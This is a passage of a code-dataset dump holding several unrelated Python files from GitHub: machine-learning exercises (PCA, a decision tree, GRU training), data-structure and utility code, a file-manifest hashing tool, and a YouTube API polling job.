feed_dict={input_data:temp_test['data'],input_label:temp_test['label']}))\n    print(Session.run(global_step))\n\nt2=time.time()\nprint(t2-t1)","repo_name":"zhaojinxi/learn_python","sub_path":"learn_tensorflow/gru.py","file_name":"gru.py","file_ext":"py","file_size_in_byte":5304,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"73918522704","text":"import os\n\nfile_list = []\ndef search(dirname):\n    filenames = os.listdir(dirname)\n    for filename in filenames:\n        full_filename = os.path.join(dirname, filename)\n        ext = os.path.splitext(full_filename)[-1]\n        if ext == '.png':\n            file_list.append(full_filename)  # collect the file path itself, not just the '.png' suffix\n\n","repo_name":"PE2-TeamB1-Project/Project","sub_path":"src/png_signal.py","file_name":"png_signal.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22707915927","text":"#encoding:utf-8\n# This module implements PCA (principal component analysis) for dimensionality reduction. The data are projected onto a new k-dimensional coordinate system whose axes are the k mutually orthogonal directions of largest variance; concretely, compute the covariance matrix of the features and then its eigenvalues and eigenvectors\n# Picking the k directions of largest variance amounts to taking the k largest eigenvalues; their eigenvectors are the direction vectors we need\nfrom numpy import *\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom matplotlib.ticker import MultipleLocator\n# load the data\ndef loadDataSet(fileName,delim='\\t'):\n    fr = open(fileName)\n    stringArr = [line.strip().split(delim) for line in fr.readlines()]\n    datArr = [map(float,data) for data in stringArr]\n    return mat(datArr)\n\n# PCA implementation\ndef pca(dataMat,TopFeatureNumber=999999):# arguments: the dataset and the target dimensionality (defaults to a very large value)\n    Datamean = dataMat.mean(axis=0)# column means\n    standardData = dataMat - Datamean# center the data so every feature has zero mean\n    covMat = cov(standardData.T)# covariance matrix\n    featureVal,featureMat = linalg.eig(covMat)# eigenvalues and eigenvectors; eigenvalue featureVal[i] corresponds to eigenvector featureMat[:,i]\n    featSortInd = argsort(-featureVal)# sort in descending order\n    featSortInd = 
featSortInd[:TopFeatureNumber]# keep the k largest eigenvalues\n    TopFeatMat = featureMat[:,featSortInd]# corresponding eigenvectors; one row per original dimension, one column per reduced dimension\n    TransData = standardData*TopFeatMat# project the original data into the new space\n\n    reconData = (TransData*TopFeatMat.T)+Datamean# map the projected data back to the original coordinate system for display, i.e. the reconstruction\n    return TransData,reconData\n\n# The real test data contains missing values (NaN); this function replaces them with the mean of the feature\ndef replaceNanWithMean():\n    dataMat = loadDataSet('secom.data',' ')\n    numFeat = shape(dataMat)[1]# number of features\n    for i in range(numFeat):# replace each NaN with the mean over the feature's observed values\n        featMean = mean(dataMat[nonzero(~isnan(dataMat[:,i].A))[0],i])\n        dataMat[nonzero(isnan(dataMat[:,i])),i] = featMean\n    return dataMat\n\n# Shows the share of total variance carried by each eigenvalue, as guidance for choosing the number of components later\ndef pcaTest(dataMat,TopFeatureNum=999999):# argument: the dataset\n    Datamean = dataMat.mean(axis=0)# column means\n    standardData = dataMat - Datamean# center the data so every feature has zero mean\n    covMat = cov(standardData.T)# covariance matrix\n    featureVal,featureMat = linalg.eig(covMat)# eigenvalues and eigenvectors; eigenvalue featureVal[i] corresponds to eigenvector featureMat[:,i]\n    FeatSortInd = argsort(-featureVal)# sort the eigenvalues so the chart is easier to read\n    varSum = sum(featureVal)# total of the eigenvalues\n    percent = (featureVal[FeatSortInd]/varSum)*100\n    Locator = MultipleLocator(5)# tick spacing\n    fig = plt.figure()\n    ax = fig.add_subplot(111)\n    x = arange(0,TopFeatureNum,1)\n    y = percent[:TopFeatureNum]\n\n    ax.scatter(x,y,marker = 'o',s=50,c='red')\n    ax.plot(x,y)\n    ax.xaxis.set_major_locator(Locator)\n    plt.show()\n\n\n#dataMat = loadDataSet('testSet.txt')\n# resultData,conData = pca(dataMat,1)\n# fig = plt.figure()\n# ax = fig.add_subplot(111)\n# ax.scatter(dataMat[:,0],dataMat[:,1],marker = '^',s=90)\n# ax.scatter(conData[:,0],conData[:,1],marker = 'o',s=50,c='red')\n# plt.show()\ndataMat = replaceNanWithMean()\npcaTest(dataMat,20)","repo_name":"pyrhaha/MachineLearning_Python","sub_path":"PCA/pca.py","file_name":"pca.py","file_ext":"py","file_size_in_byte":3545,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"25472770549","text":"import numpy as np\n'''\nA set of utility functions\n'''\n\n\ndef rootMeanSquare(a):\n    '''\n    Calculates RMS for any 1D array like object\n    '''\n    rms = 0\n    N = np.size(a)\n    for i in range(0, N):\n        rms = rms + a[i]**2\n    rms = rms/N\n    rms = np.sqrt(rms)\n    return rms\n\n\ndef fixtimedata(t):\n    '''\n    Modifies time vector from vibration logger\n    '''\n    n = len(t)\n    for i in range(n-1):\n        if t[i+1] < t[i]:\n            t[i+1:] = t[i+1:] + t[i]\n","repo_name":"albinan/BRAVibration","sub_path":"LIB/fun.py","file_name":"fun.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1116437177","text":"import sys\nfrom collections import deque\ninput= sys.stdin.readline\nt= int(input())\n\nfor _ in range(t):\n    rotate = False\n    p = input().rstrip()\n    n = int(input())\n    arr = input().rstrip().strip('[]').split(',')\n    if arr==['']: arr=[]\n    q = deque(arr)\n    \n    try: \n        for order in p: \n            if order ==\"R\":\n                rotate = not rotate\n            else:\n                if not rotate:\n                    q.popleft()\n                else:\n                    q.pop()\n\n        if rotate: q.reverse()\n        print( \"[\" + \",\".join(q) + \"]\" )\n    except:\n        print(\"error\")\n    \n","repo_name":"asdfqrt/barkingdog","sub_path":"07강 덱/AC.py","file_name":"AC.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38667664333","text":"from sklearn.metrics import accuracy_score\nimport numpy as np\nimport math\nfrom warnings import simplefilter\r\nsimplefilter(action='ignore', category=FutureWarning)\n\ndef clean_data(line):\n    return 
line.replace('(', '').replace(')', '').replace(' ', '').strip().split(',')\n\ndef fetch_data(filename):\n with open(filename, 'r') as f:\n input_data = f.readlines()\n clean_input = list(map(clean_data, input_data))\n f.close()\n return clean_input\n\n\ndef readFile(dataset_path):\n input_data = fetch_data(dataset_path)\n input_np = np.array(input_data)\n return input_np\n\ntraining_data = './datasets/DT_train.txt'\ntesting_data = './datasets/DT_test.txt'\n\ntrain_np = readFile(training_data)\ntest_np = readFile(testing_data)\n\nlabels = train_np[:,-1]\ntrain_data = train_np[:,:-1]\n\ntest_labels = test_np[:,-1]\ntest_data = test_np[:,:-1]\n\ntrain_data = train_data.astype(np.float32)\ntest_data = test_data.astype(np.float32)\n\nunique_labels = np.unique(labels)\n\nfor i in range (0,labels.size):\n for j in range (0,unique_labels.size):\n if labels[i] == unique_labels[j]:\n labels[i] = j\n break\n \nfor i in range (0,test_labels.size):\n for j in range (0,unique_labels.size):\n if test_labels[i] == unique_labels[j]:\n test_labels[i] = j\n break\n \nlabels = labels.astype(np.float32)\ntest_labels = test_labels.astype(np.float32)\n\nlabels = np.reshape(labels, (-1, 1))\ntest_labels = np.reshape(test_labels, (-1, 1))\n\n#print(train_data)\n#print(test_data)\n#print(labels)\n#print(test_labels)\n\nclass Node():\n\n def __init__(self, feature_index=None, threshold=None, left=None, right=None, information_gain=None, value=None):\n \n self.feature_index = feature_index\n self.threshold = threshold\n self.left = left\n self.right = right\n self.information_gain = information_gain\n self.value = value\n\nclass DecisionTreeClassifier():\n \n def __init__(self, min_samples_split=2, max_depth=2):\n self.root = None\n self.min_samples_split = min_samples_split\n self.max_depth = max_depth\n \n def build_tree(self, dataset, curr_depth=0):\n \n X, Y = dataset[:,:-1], dataset[:,-1]\n num_samples, num_features = np.shape(X)\n \n if num_samples>=self.min_samples_split and curr_depth<=self.max_depth:\n best_split = self.get_best_split(dataset, num_samples, num_features)\n if best_split[\"information_gain\"]>0:\n left_subtree = self.build_tree(best_split[\"dataset_left\"], curr_depth+1)\n right_subtree = self.build_tree(best_split[\"dataset_right\"], curr_depth+1)\n return Node(best_split[\"feature_index\"], best_split[\"threshold\"], left_subtree, right_subtree, best_split[\"information_gain\"])\n \n leaf_value = self.calculate_leaf_value(Y)\n return Node(value=leaf_value)\n \n def get_best_split(self, dataset, num_samples, num_features):\n \n best_split = {}\n max_information_gain = -float(\"inf\")\n \n for feature_index in range(num_features):\n \n feature_values = dataset[:, feature_index]\n possible_thresholds = np.unique(feature_values)\n for threshold in possible_thresholds:\n dataset_left, dataset_right = self.split(dataset, feature_index, threshold)\n if len(dataset_left)>0 and len(dataset_right)>0:\n y, left_y, right_y = dataset[:, -1], dataset_left[:, -1], dataset_right[:, -1]\n curr_information_gain = self.information_gain_method(y, left_y, right_y, \"gini\")\n if curr_information_gain>max_information_gain:\n best_split[\"feature_index\"] = feature_index\n best_split[\"threshold\"] = threshold\n best_split[\"dataset_left\"] = dataset_left\n best_split[\"dataset_right\"] = dataset_right\n best_split[\"information_gain\"] = curr_information_gain\n max_information_gain = curr_information_gain\n return best_split\n \n def split(self, dataset, feature_index, threshold):\n dataset_left = np.array([row 
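# boolean split: rows whose feature value is at or below the threshold go to the left child\n                                   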
for row in dataset if row[feature_index]<=threshold])\n        dataset_right = np.array([row for row in dataset if row[feature_index]>threshold])\n        return dataset_left, dataset_right\n    \n    def information_gain_method(self, parent, l_child, r_child, mode=\"entropy\"):\n        weight_l = len(l_child) / len(parent)\n        weight_r = len(r_child) / len(parent)\n        if mode==\"gini\":\n            gain = self.gini_index(parent) - (weight_l*self.gini_index(l_child) + weight_r*self.gini_index(r_child))\n        else:\n            gain = self.entropy(parent) - (weight_l*self.entropy(l_child) + weight_r*self.entropy(r_child))\n        return gain\n    \n    def entropy(self, y):\r\n        class_labels = np.unique(y)  # use the labels present in y; the global unique_labels holds the raw string labels, which never match the float-encoded y\r\n        entropy = 0\n        for cls in class_labels:\n            p_cls = len(y[y == cls]) / len(y)\n            entropy += -p_cls * np.log2(p_cls)\n        return entropy\n    \n    def gini_index(self, y):\r\n        \r\n        class_labels = np.unique(y)  # same fix as in entropy\r\n        gini = 0\n        for cls in class_labels:\n            p_cls = len(y[y == cls]) / len(y)\n            gini += p_cls**2\n        \n        return 1 - gini\n    \n    def calculate_leaf_value(self, Y):\n        Y = list(Y)\n        return max(Y, key=Y.count)\n    \n    def fit(self, X, Y):\n        dataset = np.concatenate((X, Y), axis=1)\n        self.root = self.build_tree(dataset)\n\n    def predict(self, X):\r\n        predictions = [self.single_prediction(x, self.root) for x in X]\r\n        return predictions\r\n\r\n    \r\n    def single_prediction(self, x, tree):\r\n        \r\n        if tree.value!=None: return tree.value\r\n        feature_val = x[tree.feature_index]\r\n        if feature_val<=tree.threshold:\r\n            return self.single_prediction(x, tree.left)\r\n        else:\r\n            return self.single_prediction(x, tree.right)\r\n\r\n\n    \nclassifier = DecisionTreeClassifier(min_samples_split=3, max_depth=3)\r\nclassifier.fit(train_data,labels)\r\n\r\nY_pred = classifier.predict(test_data) \r\naccuracy = accuracy_score(test_labels, Y_pred)\r\nprint(accuracy)\r\n","repo_name":"gouri-r/Machine-Learning-from-Scratch","sub_path":"DecisionTree.py","file_name":"DecisionTree.py","file_ext":"py","file_size_in_byte":6307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33707067761","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport mplhep as hep\nimport scipy.optimize as spo\nimport scipy.signal as ssp\nimport umap\nimport umap.plot\nimport hdbscan\nimport itertools\nfrom sklearn.mixture import GaussianMixture\nhep.style.use(\"CMS\")\nmethod_ = \"BFGS\"\n\ndef indices(lst, item):\n    return [i for i, x in enumerate(lst) if x == item]\n\ndef drop_preds(data,preds,val):\n    index = []\n    preds = indices(preds,val)\n    index.append(preds)\n    merged = list(itertools.chain(*index))\n    new_index = np.sort(list(set(merged)))\n    new_data = data.drop(new_index,axis=0)\n    return new_data\n\ndef scatter_difference(coordinates: list, alpha: np.array, d:np.array, s:np.array):\n    X, Y = coordinates\n    theta = np.arctan2(Y,(X-s))\n    phi = np.arctan2(Y,(d-X))\n    inner_value = np.pi - alpha - theta - phi\n    return np.abs(inner_value)**2\n\ndef loss_function(coordinates: list, alpha: np.array, d:np.array, s:np.array):\n    alpha = np.array(alpha)\n    d = np.array(d)\n    s = np.array(s)\n    X, Y = coordinates\n    theta = np.arctan2(Y,(X-s))\n    phi = np.arctan2(Y,(d-X))\n    inner_value = np.pi - alpha - theta - phi\n    return np.sum(np.abs(inner_value)**2)\n\ndef alpha_calc(X,Y,d,s):\n    theta = np.arctan2(Y,(X-s))\n    phi = np.arctan2(Y,(d-X))\n    alpha = np.pi - theta - phi\n    return alpha\n\ndef geo_difference(theory,exp):\n    diff = np.sqrt(np.sum((theory-exp)**2))\n    return diff\n\n\ndef loss_minimizer(alpha:np.array, d:np.array, s:np.array):\n    alpha = 
np.array(alpha)\n s = np.array(s)\n d = np.array(d)\n X_guess = (d[0]-s[0])/2\n Y_guess = ((d[0]-s[0]))/(np.tan(alpha[0]))\n\n res_x = []\n res_y = []\n x_err = []\n y_err = []\n\n for i in range(0,4):\n # result = spo.basinhopping(func=loss_function, x0=[X_guess,Y_guess], niter=800, T=0, minimizer_kwargs = {\"args\":(alpha,d,s),\"method\":\"Powell\",\"bounds\":([0,15],[0,15])})\n result = spo.basinhopping(func=loss_function, x0=[X_guess,Y_guess], niter=800, T=0, minimizer_kwargs = {\"args\":(alpha,d,s),\"method\":method_,\"bounds\":([0,15],[0,15])})\n\n\n # inv_hessian = result.lowest_optimization_result.hess_inv.todense()\n # det_inv_hessian = inv_hessian[0][0] * inv_hessian[1][1] - inv_hessian[0][1] * inv_hessian[1][0]\n\n res_x.append(result.x[0])\n res_y.append(result.x[1])\n # x_err.append(np.sqrt(inv_hessian[1][1]/det_inv_hessian))\n # y_err.append(np.sqrt(inv_hessian[0][0]/det_inv_hessian))\n\n res_x = np.array(res_x)\n res_y = np.array(res_y)\n return [np.mean(res_x),np.mean(res_y)]\n\n\n# CHANGE TO YOUR VALUE\n# Declare true geometry\n# x_1_true = 12\n# x_2_true = 4\n# y_1_true = 8\n# y_2_true = 9\nx_1_true = 20\nx_2_true = 10\ny_1_true = 7\ny_2_true = 4\n\n# CHANGE TO YOUR VALUE\nX_bounds = [1,30]\nY_bounds = [1,10]\ngeometries = []\nsix_alpha_temp = []\nsix_s_temp = []\nsix_d_temp = []\nsix_label = []\nsix_x = []\nsix_y = []\ntwo_alpha_temp = []\ntwo_s_temp = []\ntwo_d_temp = []\ntwo_label = []\ntwo_x = []\ntwo_y = []\nvalid_geometry = []\nfor x in range(X_bounds[0],X_bounds[1]+1):\n for y in range(Y_bounds[0],Y_bounds[1]+1):\n for s in range(X_bounds[0],X_bounds[1]+1):\n for d in range(X_bounds[0]+1, X_bounds[1]):\n # alpha = alpha_calc(x,y,d,s)\n # geometries.append([s,d,alpha,x,y])\n # print(x)\n if (x == x_1_true) and (y==y_1_true):\n valid_alpha = alpha_calc(x,y,d,s)\n valid_geometry.append([x,y,d,s,valid_alpha])\n six_d_temp.append(d)\n six_s_temp.append(s)\n six_alpha_temp.append(valid_alpha)\n six_label.append(6) #Add dynamic (X,Y) here\n six_x.append(x)\n six_y.append(y)\n if (x == x_2_true) and (y==y_2_true):\n valid_alpha = alpha_calc(x,y,d,s)\n valid_geometry.append([x,y,d,s,valid_alpha])\n two_d_temp.append(d)\n two_s_temp.append(s)\n two_alpha_temp.append(valid_alpha)\n two_label.append(2) #Add dynamic (X,Y) here\n two_x.append(x)\n two_y.append(y)\n\ntwo_x = (two_d_temp[0]-two_s_temp[0])/2\nsix_x = (six_d_temp[0]-six_s_temp[0])/2\ntwo_y = ((two_d_temp[0]-two_s_temp[0]))/(np.tan(two_alpha_temp[0]))\nsix_y = ((six_d_temp[0]-six_s_temp[0]))/(np.tan(six_alpha_temp[0]))\ncombined_alpha = np.array(two_alpha_temp + six_alpha_temp)\ncombined_s = np.array(two_s_temp + six_s_temp)\ncombined_d = np.array(two_d_temp + six_d_temp)\ncombined_labels = six_label + two_label\ncombined_x = []\ncombined_y = []\n\n\nfor i in range(0,len(combined_s)):\n\n x_guess = float((combined_d[i]+combined_s[i])/2)\n # y_guess = ((combined_d[i]+combined_s[i]))/(np.sin(combined_alpha[i]))\n\n y_guess = np.abs(0.5*((combined_d[i]-combined_s[i]))/(np.tan(combined_alpha[0])))\n\n bounds = spo.Bounds(lb=[0,0],ub=[20,20])\n # result = spo.basinhopping(func=scatter_difference, niter=500, x0=list([x_guess,y_guess]), T=0, minimizer_kwargs = {\"args\":(combined_alpha[i],combined_d[i],combined_s[i]),\"method\":method_,\"bounds\":bounds})\n result = spo.basinhopping(func=scatter_difference, niter=20, x0=list([x_guess,y_guess]), T=0, minimizer_kwargs = {\"args\":(combined_alpha[i],combined_d[i],combined_s[i]),\"method\":method_})\n\n # result = spo.basinhopping(func=scatter_difference, niter=500, 
x0=[x_guess,y_guess], T=0, minimizer_kwargs = {\"args\":(combined_alpha[i],combined_d[i],combined_s[i]),\"method\":'Powell',\"bounds\":([0,20],[0, 20])})\n\n if result.x[0] < 0:\n combined_x.append(0)\n else:\n combined_x.append(result.x[0])\n if result.x[1] < 0:\n combined_y.append(0)\n else:\n combined_y.append(result.x[1])\n\ndata = {'x':combined_x,'y':combined_y}\ndata = pd.DataFrame(data = data)\n\n# birch clustering\nfrom numpy import unique\nfrom numpy import where\nfrom sklearn.datasets import make_classification\nfrom sklearn.cluster import Birch\nfrom matplotlib import pyplot\n# define dataset\n# X, _ = make_classification(n_samples=1000, n_features=2, n_informative=2, n_redundant=0, n_clusters_per_class=1, random_state=4)\nX = np.array(data)\nprint(\"AHHH\",len(X))\n# X[0] = X[ : ,0][(X[1])>2]\n# X[1] = X[ : ,1][(X[1])>2]\nX = X[X[ : ,1] > 2]\n\n# X.remove(X[1][X[1] < 2])\nprint(\"X data\",X)\n# define the model\nmodel = GaussianMixture(n_components=2,n_init=4,max_iter=500)\n# fit the model\nmodel.fit(X)\n# assign a cluster to each example\nyhat = model.predict(X)\n# retrieve unique clusters\nclusters = unique(yhat)\n# create scatter plot for samples from each cluster\ncoordinates = []\nfor i,cluster in enumerate(clusters):\n # get row indexes for samples with this cluster\n row_ix = where(yhat == cluster)\n # create scatter of these samples\n pyplot.scatter(X[row_ix, 0], X[row_ix, 1],label=\"Cluster \"+str(i))\n coordinates.append(np.array([X[row_ix, 0], X[row_ix, 1]]))\n# show the plot\n# print(coordinates)\npyplot.xlabel(\"X position (arb.)\")\npyplot.ylabel(\"Y position (arb.)\")\npyplot.legend(loc=\"upper right\")\npyplot.show()\n\nfor i in range(0,len(coordinates)):\n plt.scatter(coordinates[i][0],coordinates[i][1])\n\n plt.show()\n d = {'x':np.array(coordinates[i][0][0]),'y':np.array(coordinates[i][1][0])}\n Y = pd.DataFrame(d)\n Y = np.array(Y)\n\n # define the model\n model = GaussianMixture(n_components=2,n_init=4,max_iter=500)\n # fit the model\n model.fit(Y)\n # assign a cluster to each example\n yhat = model.predict(Y)\n # retrieve unique clusters\n clusters = unique(yhat)\n # create scatter plot for samples from each cluster\n # coordinates = []\n for j,cluster in enumerate(clusters):\n # get row indexes for samples with this cluster\n row_ix_ = where(yhat == cluster)\n # create scatter of these samples\n pyplot.scatter(Y[row_ix_, 0], Y[row_ix_, 1],label=\"Cluster \"+str(j))\n # show the plot\n \n pyplot.xlabel(\"X position (arb.)\")\n pyplot.ylabel(\"Y position (arb.)\")\n pyplot.legend(loc=\"upper right\")\n \n \n pyplot.show()\n\n\n\n\n\n\n","repo_name":"Jacob-J-E/Y3Lab","sub_path":"Compton_Effect/Imaging/initial_guess_ML.py","file_name":"initial_guess_ML.py","file_ext":"py","file_size_in_byte":8051,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"32799902841","text":"\"\"\"Doubly linked list.\"\"\"\n\n\nclass Node(object):\n \"\"\"Node for a doubly linked list.\"\"\"\n\n __slots__ = ('object', 'next', 'prev')\n\n def __init__(self, obj):\n \"\"\"Initialize a node.\n\n :param obj: Object to be stored in a node.\n \"\"\"\n self.object = obj\n self.next = None\n self.prev = None\n\n\nclass DoublyLinkedList(object):\n \"\"\"Doubly linked list.\n\n It implements a linked data structure that consists of a set of\n sequentially linked records called nodes. 
Each node contains two fields,\n called links, that are references to the previous and to the next node\n in the sequence of nodes\n (see https://en.wikipedia.org/wiki/Doubly_linked_list).\n \"\"\"\n\n __slots__ = ('_first_node', '_last_node')\n\n def __init__(self):\n \"\"\"Initialize a list.\"\"\"\n super(DoublyLinkedList, self).__init__()\n\n self._first_node = None\n self._last_node = None\n\n @property\n def first_node(self):\n \"\"\"Get the first node in the list.\"\"\"\n return self._first_node\n\n @property\n def last_node(self):\n \"\"\"Get the last node in the list.\"\"\"\n return self._last_node\n\n def insert_beginning(self, new_node):\n \"\"\"Insert new node at the beginning of the list.\n\n :param new_node: New node to be inserted.\n \"\"\"\n if self._first_node is None:\n self._first_node = new_node\n self._last_node = new_node\n new_node.prev = None\n new_node.next = None\n else:\n self.insert_before(self._first_node, new_node)\n\n def insert_end(self, new_node):\n \"\"\"Insert new node at the end of the list.\n\n :param new_node: New node to be inserted.\n \"\"\"\n if self._last_node is None:\n self.insert_beginning(new_node)\n else:\n self.insert_after(self._last_node, new_node)\n\n def insert_after(self, node, new_node):\n \"\"\"Insert new node after the given one.\n\n :param node: A node after which the new one must be inserted.\n :param new_node: New node to be inserted.\n \"\"\"\n new_node.prev = node\n if node.next is None:\n new_node.next = None\n self._last_node = new_node\n else:\n new_node.next = node.next\n node.next.prev = new_node\n node.next = new_node\n\n def insert_before(self, node, new_node):\n \"\"\"Insert new node before the given one.\n\n :param node: A node before which the new one must be inserted.\n :param new_node: New node to be inserted.\n \"\"\"\n new_node.next = node\n if node.prev is None:\n new_node.prev = None\n self._first_node = new_node\n new_node.next.prev = new_node\n else:\n new_node.prev = node.prev\n node.prev.next = new_node\n node.prev = new_node\n\n def remove(self, node):\n \"\"\"Remove given node from the list.\n\n :param node: A node that must be removed.\n \"\"\"\n if node.prev is None:\n self._first_node = node.next\n else:\n node.prev.next = node.next\n\n if node.next is None:\n self._last_node = node.prev\n else:\n node.next.prev = node.prev\n","repo_name":"pgoltsev/interview","sub_path":"src/lru/structures/doubly_linked_list/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12928883680","text":"from abc import ABCMeta\nfrom datetime import datetime\nfrom hashlib import sha256\nfrom math import ceil\nfrom os import walk\nfrom pathlib import Path\n\nimport toml\n\nfrom .static import KILOBYTE, MEGABYTE, ALLOWED_CHUNK_SIZES\n\n\nclass PackagePath:\n \"\"\" Extends pathlib.Path adding some commonly used utility methods.\"\"\"\n\n def __init__(self, path: str):\n self.path = Path(path)\n\n def sha256sum(self) -> str:\n \"\"\"SHA256 Checksum of the file at self.path.\"\"\"\n hash_algo = sha256()\n buffer = bytearray(128 * KILOBYTE)\n buffer = memoryview(buffer)\n\n with open(self.path, \"rb\", buffering=0) as read_file:\n for chunk in iter(lambda: read_file.readinto(buffer), 0):\n hash_algo.update(buffer[:chunk])\n return hash_algo.hexdigest()\n\n def exists(self) -> bool:\n \"\"\"Checks if the file at self.path exists.\"\"\"\n return self.path.exists()\n\n def chunk_len(self, 
chunk_buffer_size: int) -> int: # TODO: rename count_chunks\n \"\"\"Counts the amount of buffer_size chunks a file can be divided by.\"\"\"\n\n return ceil(len(self) / chunk_buffer_size)\n\n @property\n def name(self) -> str:\n \"\"\"Returns the name of the file.\"\"\"\n return str(self.path.name)\n\n def __len__(self):\n return self.path.stat().st_size\n\n def __str__(self):\n return self.name\n\n def is_dir(self) -> bool:\n \"\"\"Returns True if the path leads to a directory.\"\"\"\n return self.path.is_dir()\n\n def is_file(self) -> bool:\n \"\"\"Returns True if the path leads to a file.\"\"\"\n return self.path.is_file()\n\n\nclass FileManifest(metaclass=ABCMeta):\n \"\"\"Provides basic functionality needed to build a file manifest.\"\"\"\n\n def __init__(self, target_path: str, chunk_buffer_size: int, *args, **kwargs):\n self.package_path = PackagePath(target_path)\n\n if chunk_buffer_size not in ALLOWED_CHUNK_SIZES:\n raise ValueError(\"{chunk_buffer_size} is not an allowed buffer size.\")\n\n self.chunk_buffer_size = chunk_buffer_size\n self.top_directory = None\n\n # Optional Stuff\n self.extras = dict()\n\n self.extras[\"creation_date\"] = str(datetime.now())\n self.extras[\"comment\"] = kwargs.get(\"comment\", None)\n self.extras[\"created_by\"] = kwargs.get(\"created_by\", None)\n\n self.extras = {\n k: v for k, v in self.extras.items() if v is not None\n } # removes none values\n\n def verify(self):\n \"\"\"Verifies all files in the manifest exist.\"\"\"\n for file_ in self:\n assert file_.exists() # TODO: Change to if execption\n\n def __repr__(self):\n return \"\\n\".join([f\"{key} : {value}\" for key, value in self.__dict__.items()])\n\n\nclass MultipleFileManifest(FileManifest):\n \"\"\"Extends FileManifest provides multi-file functionality.\"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.path_list = self.get_paths()\n self.top_directory = self.package_path.name\n\n def get_paths(self):\n \"\"\"Returns a list of all the files.\"\"\"\n paths_list = []\n for directory, _, files in walk(self.package_path.path):\n for file_ in files:\n current_path = PackagePath(f\"{directory}/{file_}\")\n assert current_path.exists() # TODO: Change to if exeption\n paths_list.append(current_path)\n return paths_list\n\n def __iter__(self):\n return iter(self.path_list)\n\n\n# IDEA Custom Multi File Manifest Class\n# Initailly makes a custom named top directory.\n# Next, it finds the absolute path to all the choosen files and creates symlinks\n# to the files in the custom top directory.\n# uses os.walk followlinks=True options to walk symbolic links that resolve to dirs.\n\n\nclass SingleFileManifest(FileManifest):\n \"\"\"Extends FileManifest provides single file functionality.\"\"\"\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n @property\n def name(self):\n return str(self.package_path)\n\n def __iter__(self):\n return iter([self.package_path])\n\n\nclass ManifestMaker:\n \"\"\"Factory class provides functions to build a manifest.\"\"\"\n\n def create(target_path: str, chunk_buffer_size: int, *args, **kwargs):\n \"\"\"Creates file manifest from the target_path.\"\"\"\n path = Path(target_path)\n\n assert path.exists() # TODO: Change if exception\n\n if path.is_dir():\n return MultipleFileManifest(target_path, chunk_buffer_size, *args, **kwargs)\n\n if path.is_file():\n return SingleFileManifest(target_path, chunk_buffer_size, *args, **kwargs)\n\n def write(manifest: FileManifest, destination: str, 
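# note: chunk size is passed in explicitly even though FileManifest already stores one from its constructor\n              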
chunk_buffer_size: int):\n \"\"\"Writes file manifest of files to the destination.\"\"\"\n\n manifest.verify()\n\n header = dict()\n file_list = []\n master_hash = \"\"\n\n header.update(manifest.extras)\n header[\"chunk_buffer_size\"] = chunk_buffer_size\n\n if manifest.top_directory:\n header[\"top_directory\"] = manifest.top_directory\n\n for current_file in manifest:\n\n manifest = dict()\n manifest[\"name\"] = current_file.name\n manifest[\"path\"] = str(current_file.path)\n\n file_hash = current_file.sha256sum()\n master_hash += file_hash\n\n manifest[\"hash\"] = file_hash\n manifest[\"chunks\"] = current_file.chunk_len(chunk_buffer_size)\n\n file_list.append(manifest)\n\n header[\"master_hash\"] = master_hash\n\n destination_path = Path(destination)\n destination_path.touch()\n\n with open(destination_path, mode=\"a\") as destination_file:\n data = toml.dumps({\"header\": header})\n\n destination_file.write(data)\n destination_file.write(\"\\n\")\n\n for file_information in file_list:\n name = file_information.pop(\"name\")\n data = toml.dumps({name: file_information})\n\n destination_file.write(data)\n destination_file.write(\"\\n\")\n","repo_name":"dgnsrekt/g-packer","sub_path":"g_packer/manifest.py","file_name":"manifest.py","file_ext":"py","file_size_in_byte":6118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"18131166063","text":"from datetime import datetime\nfrom .models import Video\nimport requests\nfrom config import SECRETS\n\ndef my_scheduled_job():\n pageToken = \"\"\n for _ in range(10):\n headers = {\n 'Accept': 'application/json',\n }\n params = {\n 'key': SECRETS['YOUTUBE_API_KEYS'][0],\n 'part': 'snippet',\n 'maxResults': 50,\n 'order': 'date',\n 'type': 'video',\n 'publishedAfter': '2020-01-01T00:00:00Z',\n 'q': 'education',\n 'pageToken': pageToken\n }\n for attempt in range(len(SECRETS['YOUTUBE_API_KEYS'])):\n try:\n response = requests.get('https://youtube.googleapis.com/youtube/v3/search', headers=headers, params=params)\n response_json = response.json()\n print(response_json)\n if (\"error\" in response_json): raise Exception(\"unhandlable response\")\n except:\n params['key']=SECRETS['YOUTUBE_API_KEYS'][attempt+1]\n else:\n pageToken = response_json['nextPageToken']\n for item in response_json['items']:\n video = Video(\n video_id = item['id']['videoId'], \n title = item['snippet']['title'],\n description = item['snippet']['description'],\n etag = item['etag'],#signifies change\n channel_id = item['snippet']['channelId'],\n channel_title = item['snippet']['channelTitle'],\n published_at = datetime.strptime(item['snippet']['publishedAt'], \"%Y-%m-%dT%H:%M:%SZ\"),\n thumbnail_url = item['snippet']['thumbnails']['default']['url']\n )\n video.save()\n break\n\n \n","repo_name":"alok760/youtube_explore","sub_path":"youtube_explore/cron.py","file_name":"cron.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"72718024466","text":"#!/usr/bin/python3\nimport sys\nimport subprocess\nimport os\nimport json\nimport 